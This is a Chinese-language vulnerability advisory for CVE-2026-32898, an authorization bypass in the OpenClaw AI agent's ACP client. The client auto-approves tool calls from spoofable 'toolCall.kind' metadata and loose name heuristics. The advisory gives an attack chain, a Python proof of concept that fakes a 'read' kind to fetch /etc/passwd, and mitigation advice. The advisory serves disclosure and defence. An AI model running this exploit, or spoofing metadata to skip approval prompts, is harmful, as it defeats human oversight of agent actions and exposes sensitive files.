CVE-2026-32898 CVSS 5.4 中危

CVE-2026-32898 OpenClaw授权绕过漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32898

漏洞类型

授权绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.23之前的版本存在授权绕过漏洞。ACP客户端根据不受信任的toolCall.kind元数据和宽松的名称启发式算法自动批准工具调用。攻击者可以通过欺骗工具元数据或使用非核心类读取名称，绕过对读取类操作的交互式批准提示。

技术细节

该漏洞的核心在于OpenClaw的ACP客户端实现中存在逻辑缺陷。系统为了提升用户体验，设计了一种自动批准机制，旨在通过检查`toolCall.kind`元数据以及工具名称的启发式匹配（heuristic name matching）来识别并自动放行“读取类”操作。然而，该机制错误地信任了由客户端或工具本身提供的`toolCall.kind`元数据，且名称匹配规则过于宽松，未对元数据的完整性和来源进行严格验证。攻击者可以利用这一点，通过构造恶意的工具调用请求，将`toolCall.kind`伪造为系统认为是“安全”的类型，或者使用符合启发式规则但实际功能并非只读的工具名称。这使得恶意请求能够绕过原本必须经过用户交互确认的安全检查，直接获得执行权限，从而导致信息泄露或完整性受损。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是OpenClaw，且版本低于2026.2.23。

STEP 2

2. 构造恶意请求

攻击者分析ACP客户端的自动批准逻辑，构造包含伪造`toolCall.kind`元数据（如设置为'read'）或特定名称的工具调用请求。

STEP 3

3. 发起攻击

攻击者向目标系统发送精心设计的工具调用请求。

STEP 4

4. 绕过授权

由于系统信任了不可信的元数据或匹配了宽松的名称规则，请求被错误地归类为安全操作，绕过了交互式批准提示。

STEP 5

5. 执行恶意操作

系统自动执行了请求的操作，可能导致敏感数据读取或低权限修改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Exploit PoC for CVE-2026-32898
# Demonstrates bypassing the ACP approval prompt by spoofing toolCall.kind

def exploit_openclaw(target_url):
    # Malicious payload designed to bypass heuristic checks
    payload = {
        "toolCall": {
            "kind": "read",  # Spoofing the kind to trigger auto-approval
            "name": "get_sensitive_data",  # A name that might pass heuristics
            "arguments": {
                "file": "/etc/passwd"
            }
        }
    }

    headers = {
        'Content-Type': 'application/json'
    }

    try:
        # Sending the crafted request to the ACP client endpoint
        response = requests.post(f"{target_url}/api/acp/execute", data=json.dumps(payload), headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Authorization bypassed.")
            print("[+] Response:", response.text)
        else:
            print("[-] Exploit failed or target patched.")
            print("[-] Status Code:", response.status_code)

    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-openclaw-instance:8080"
    exploit_openclaw(target)

影响范围

OpenClaw < 2026.2.23

防御指南

临时缓解措施

建议立即检查OpenClaw版本，若低于2026.2.23应尽快应用官方补丁。在升级前，建议禁用ACP客户端的自动批准功能，对所有工具调用执行严格的人工审核，并密切监控系统日志中的异常工具调用行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表